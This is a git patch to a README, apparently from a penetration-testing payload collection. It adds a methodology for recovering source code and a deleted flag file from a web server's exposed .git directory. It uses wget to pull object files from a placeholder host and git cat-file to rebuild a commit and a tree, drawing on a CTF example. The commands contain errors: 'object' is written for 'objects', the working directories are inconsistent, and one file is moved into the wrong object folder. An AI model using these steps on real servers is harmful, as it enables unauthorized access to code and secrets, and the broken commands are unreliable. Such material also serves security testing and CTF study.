From 90265b82503ee7bda305e76c29cb02bb6373242f Mon Sep 17 00:00:00 2001
From: Swissky <maxropelewski@gmail.com>
Date: Sun, 19 Mar 2017 23:51:56 +0100
Subject: [PATCH] Git - methodology

---
 Git Svn insecure files/README.md | 52 +++++++++++++++++++++++++++++---
 1 file changed, 48 insertions(+), 4 deletions(-)

diff --git a/Git Svn insecure files/README.md b/Git Svn insecure files/README.md
index 7bd72f5..bd08257 100644
--- a/Git Svn insecure files/README.md	
+++ b/Git Svn insecure files/README.md	
@@ -5,13 +5,57 @@ Github example
 
 2. Git saves all informations in log file .git/logs/HEAD (try 'head' too)
 ```
-0000000000000000000000000000000000000000 07603070376d63d911f608120eb4b5489b507692 
-bloorq@gmail.com <bloorq@gmail.com> 1452195279 +0000    commit (initial): index.php initial commit
+0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000        clone: from https://github.com/fermayo/hello-world-lamp.git
+15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000        commit: Initial.
+26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000        commit: Whoops! Remove flag.
+6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000        commit: Prevent directory listing.
 ```
 
-3. Acces the commit based on the hash -> a directory name (first two signs from hash) and filename (rest of it).git/objects/07/603070376d63d911f608120eb4b5489b507692, 
+3. Acces the commit based on the hash -> a directory name (first two signs from hash) and filename (rest of it).git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c, 
+```
+# create a .git directory
+git init test
+cd test/.git
 
-4. Use diggit.py
+# download the file
+wget http://xxx.web.xxx.com/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
+mkdir .git/object/26
+mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/
+
+# display the content of the file
+git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
+	tree 323240a3983045cdc0dec2e88c1358e7998f2e39
+	parent 15ca375e54f056a576905b41a417b413c57df6eb
+	author Michael <michael@easyctf.com> 1489390329 +0000
+	committer Michael <michael@easyctf.com> 1489390329 +0000
+	Initial.
+```
+
+4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
+```
+wget http://xxx.web.xxx.com/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
+mkdir .git/object/32
+mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
+
+git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
+	040000 tree bd083286051cd869ee6485a3046b9935fbd127c0        css
+	100644 blob cb6139863967a752f3402b3975e97a84d152fd8f        flag.txt
+	040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97        fonts
+	100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1        index.html
+	040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8        js
+```
+
+5. Read the data (flag.txt)
+```
+wget http://xxx.web.xxx.com/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
+mkdir .git/object/cb
+mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
+git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
+```
+
+
+
+5. Alternative way : diggit.py
 ```
 ./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
 ./diggit.py -u http://webpage.com -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1